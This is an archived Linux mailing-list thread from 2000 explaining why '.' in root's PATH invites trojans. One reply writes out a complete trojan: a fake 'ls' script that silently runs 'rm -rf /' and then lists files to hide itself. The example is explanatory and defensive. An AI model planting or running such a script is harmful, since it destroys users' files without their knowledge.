ok, thanks for the info. I never really thought of it like that, someone else
running as root. Even though they would never get my password, I guess there are
other ways of becoming root. Thanks again.
jake
On Mon, 31 Jul 2000, Charles Galpin wrote:
--I didn't see anyone answer this, so I'll give it a stab.
--
--It protects you against trojans. The beauty of the unix security model is
--that a 'regular' user can't do much wrong to the system, only to
--themselves. However if you can get root to run something malicious (like
--"rm -rf /") then you can really cause some damage.
--
--If root has "." in their path, then programs in the current directory may
--be found and run. If it's at the end of the path then the risk is much
--less, but still there.
--
-- *** DO NOT TRY THIS **
--A trivial example of a trojan would be creating a file called 'ls' in /tmp
--with the following contents
--
--#!/bin/sh
--rm -rf / >& /dev/null&
--/bin/ls
--
--If this were made executable and someone with "." in their path before
--/bin ran this, you might have a lot of files missing before you realize
--it (since it does indeed do a ls as well). If it were root, then you would
--lose all your files..
--
--I hope this has been a clear enough description to scare the hell out of
--you and remove "." from your regular accounts as well. Sadly enough you
--won't (like me) and probably have rm aliased to 'rm -f' even though it's
--bitten you in the ass several times already. Hey, that's what backups are
--for right? Of course I am nowhere near that casual with my root acounts.
--
--charles
--
--On Fri, 28 Jul 2000, Steve Arnold wrote:
--
--> Jake McHenry wrote:
-->
--> > What is such a security error with what I said? I've never done what I said, but
--> > about the same thing. I have root's login disabled, to I have to su to root. I
--> > have the . at the end of my user's path, and when I su to root, it keeps my
--> > paths, including the ., so I always can run the program in the current
--> > directory. I only su to root when I need to, don't use it for everything, hence
--> > why I did it this way. I've always done this. Can someone please explain to me
--> > why it is such a security problem? And sorry to the person that I told this to,
--> > if I realized this was a mistake, I wouldn't have told him to do that.
-->
--> I'd like to hear a good answer on this one, too. Although I do the
--> "./blah" thing for messing around with stuff in the current directory,
--> I'm not sure what the big deal is. Is it just the possibility of
--> running something un-intended as root that's the big danger here?
-->
--> Don't leave us dangling...
-->
--> Steve
-->
-->
-->
--> --
--> To unsubscribe: mail [EMAIL PROTECTED] with "unsubscribe"
--> as the Subject.
-->
--
--
----
--To unsubscribe: mail [EMAIL PROTECTED] with "unsubscribe"
--as the Subject.
--
--
Jake McHenry
[EMAIL PROTECTED]
--
To unsubscribe: mail [EMAIL PROTECTED] with "unsubscribe"
as the Subject.
